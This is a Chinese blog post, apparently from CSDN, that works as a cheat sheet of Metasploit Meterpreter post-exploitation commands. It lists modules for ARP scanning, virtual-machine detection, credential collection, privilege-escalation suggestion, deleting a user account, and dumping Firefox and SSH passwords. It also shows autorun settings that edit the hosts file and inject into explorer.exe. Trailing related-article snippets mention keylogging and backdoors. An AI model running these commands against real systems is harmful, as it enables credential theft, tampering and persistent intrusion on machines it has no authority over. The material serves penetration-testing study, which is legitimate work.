Msf后渗透测试阶段_POST模块

最新推荐文章于 2024-11-11 07:35:43 发布
最新推荐文章于 2024-11-11 07:35:43 发布
阅读量366 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: kali_linux渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42952508/article/details/128625689
该文描述了一系列使用Meterpreter工具进行的网络侦查任务,包括ARP扫描以确定网络设备,检查目标是否运行在虚拟机上,收集用户凭证,列举安装的应用程序,查看当前登录用户,获取SNMP设置,搜索本地提权漏洞,以及删除用户账户。此外,还涉及到了读取目标主机的Firefox和SSH凭据,以及如何自动执行脚本,如修改hosts文件,进程注入和获取最近打开的文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

POST模块

run post/windows/gather/arp_scanner RHOSTS=192.168.0.0/24
  #ARP扫描

在这里插入图片描述

run post/windows/gather/checkvm  #查询目标是不是虚拟机

在这里插入图片描述

run post/windows/gather/credentials/credential_collector 
  #查看用户信息

run post/windows/gather/enum_applications
  #查看安装了哪些应用程序

在这里插入图片描述

run post/windows/gather/enum_logged_on_users
  #查看目前正在登陆的用户

在这里插入图片描述

run post/windows/gather/enum_snmp
  #查看目标机器的snmp配置

在这里插入图片描述

run post/multi/recon/local_exploit_suggester 
#查看本地提权漏洞

在这里插入图片描述

run post/windows/manage/delete_user USERNAME=sbz
  #删除用户账号

在这里插入图片描述

run post/multi/gather/env
  #查看目标机器环境变量

在这里插入图片描述

run post/multi/gather/firefox_creds
  #查看目标本机的firefox流量的账号密码
run post/multi/gather/ssh_creds
  #查看本机SSH的账号密码

自动执行meterpreter脚本

set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com  #修改host文件
set InitialAutoRunScript checkvm

自动执行post模块

set initialautorunscript migrate -n explorer.exe #注入进程
set autorunscript post/windows/gather/dumplinks  #查询最近文件
kali metasploit 后渗透Post模块
qq_51685718的博客
10-28 489
如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能。我这由于没安装火狐导致报错。
Kali linux 学习笔记(九十九)metasploit framework——后渗透阶段(三) 2020.4.30
闵行小鱼塘
04-30 732
在获取shell后,需要扩大战果,提权,信息收集,渗透内网,永久后门
Metasploit开发笔记之编写一个Post模块
K
11-11 2445
就像编写软件一样,在开始编码之前,你应该对你的Post模块的目标有一个清晰明确的计划。会话对象就是这样的重要。它是你无法缺少的唯一对象,它是你的珍宝。所有的Post模块和其他相关的Mixin基本上都是建立在会话对象之上的,因为它知道有关被攻破主机的所有信息,并允许你控制它。这是一个坏主意,因为你很可能提交了你不打算修改的其他代码,或者你可能会将不必要的提交历史一起合并,而实际上你只需要一个提交。正如我们所解释的,大多数 Post 模块的 mixin 都是建立在会话对象之上的,而且有很多这样的 mixin。
Metasploit -- 后渗透模块(POST)
Web安全工具库
03-01 1051
​给时间一点时间,让过去过去,让开始开始。。。 ---- 网易云热评 作用:获取目标主机后shell后,继续信息收集,提权 1、获取目标分区情况 run post/windows/gather/forensics/enum_drives 2、检测是否是虚拟主机 run post/windows/gather/checkvm 3、获取当前安装的应用程序 runpost/windows/gather/enum_applications 4、获取用户登录信息 run post/..
获取shell后各种命令及操作
2201_75387456的博客
05-31 1183
假设目标机器上有鼠标指针,那么说明可以输入内容,那我们就可以使用。这个时候,目标的记事本里就多出了一些内容,就是我们刚刚输入的。如果其它程序需要访问这个内网环境,就可以建立。目标机器输入东西的话,就可以获取到键盘记录。:显示自己当前系统的所有文件和文件夹。:列出当前路径下的所有文件和文件夹。指定一个自定义的变量,以确定输出格式。: 使用当前伪造的线程令牌运行进程。进行记录的导出,如果不想监听了才。:使用当前伪造的线程令牌运行进程。加载扩展后,我们可以使用基本的。当然,也可以上传很多扩展,比。
网络安全基于Metasploit Framework的后渗透测试技术:利用MSF进行木马生成与持久化控制
最新发布
05-09
文中讲解了MSF中exploit、payload、auxiliary、post、encoder五大模块的功能与应用场景,尤其聚焦于后渗透测试阶段。通过实例演示了利用msfvenom工具制作木马程序的方法,包括设定LHOST和LPORT参数生成特定格式的...
MSF及Windows渗透测试
qq_67812668的博客
08-09 1227
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
msf 渗透测试
06-05
- **Post**: 后渗透模块,用于获取系统信息、提权等。 3. **日志记录路径**: `~/.msf4/logs/scripts/` - 保存脚本运行的日志记录和其他相关信息。 #### 三、Metasploit前期渗透技巧 1. **msfconsole**: ...
MSF后渗透之获取windows登录密码
qq_55364369的博客
09-05 3086
MSF后渗透之获取windows登录密码
118.网络安全渗透测试—[权限提升篇16]—[Windows MSF提权模块&提权审计工具]
qwsn
07-08 5018
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)生成攻击载核:(2)msf开启监听: (3)利用文件上传的MIME白名单类型突破,上传了up.aspx大马,然后上传64.exe并执行,后得到一个低权限的shell: (4)当前session下执行漏洞检测模块: #这里没有扫描到漏洞,可以换个方法扫描 当然了也可以指定session进行漏洞检测: (5)挂起session,在Metasploit控制台下search搜索2008 #根据关键字搜索,晒选结果中loc
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 2002
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
ATT&CK实战系列——红队实战(一)
shawdow_bug的博客
08-20 1134
第一个红日靶场的渗透测试笔记
Meterpreter内网穿透
快吃小蛋糕吧的博客
11-06 3578
本文转载自https://www.freebuf.com/articles/network/125278.html 本文实操部分均为本人复现 纵深防御也被被称之为“多层防御”,这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险,在其中有些电脑被入侵或是泄密时,风险可以大大降低。举例来说,防毒软件被安装于个人工作站上,电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。 何谓路由 确定设备如.
黑客笔记:记一次sql注入到内网漫游
QIANDXX的博客
01-06 708
对于红队队员来说,打点之后最重要的就是横向的内网渗透了。
Metasploit技术(五)——系统命令
Phantom03167的博客
04-20 3612
系统命令
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 3万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
[总结]多种方式探测内网存活主机
guanjian_ci的博客
05-29 4745
0x01 Netbios协议探测 1.1 netbios简介 IBM公司开发,主要用于数十台计算机的小型局域网。该协议是一种在局域网上的程序可以使用的应用程序编程接口(API),为程序提供了请求低级服务的同一的命令集,作用是为了给局域网提供网络以及其他特殊功能。系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名-——特指基于NETBIOS协议获得计算机名称——解析为相应IP地址,实现信息通讯,所以在局域网内部使用NetBIOS协议可以方便地实现消息通信及资源的共享 1.2 n
系统内核溢出漏洞提权
weixin_46104215的博客
11-28 3885
系统内核溢出漏洞提权是一种通用的提权的方法,攻击者通常可以使用该方法绕过系统的所有安全限制。攻击者利用该漏洞的关键是目标系统没有及时安装补丁。 存在局限性:如果目标系统的补丁更新工作较为迅速和完善,那么攻击者要想通过这种方法提权,就必须找出目标系统中的 0day漏洞 存在四种发现缺少补丁方法 方法一:手动执行命令 先获取目标系统的一个普通用户的shell(common shell), ...
后渗透之meterpreter学习笔记
迷风小白
11-08 8105
0x00 前言 由于最近想学习关于内网渗透的一些知识,前面也有师傅写了关于meterpreter的使用攻略,我这里就来复现学习一下。 Meterpreter是Metasploit框架中的一个扩展模块,作为后渗透阶段的利器,其强大之处可想而知,我这里就简单介绍一下常用命令。 0x01 系统命令 基本系统命令 background # 将当前会话放置后台 sessions # sessions...
《Metasploit渗透测试指南》全面更新修订版发布
4. **后渗透测试Post-exploitation)**:一旦漏洞被利用,渗透测试人员往往需要在系统内进行进一步的操作。新版修订版可能会包含这些操作的详细说明,如系统提权、信息窃取、权限维持等。 ### 知识点五:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值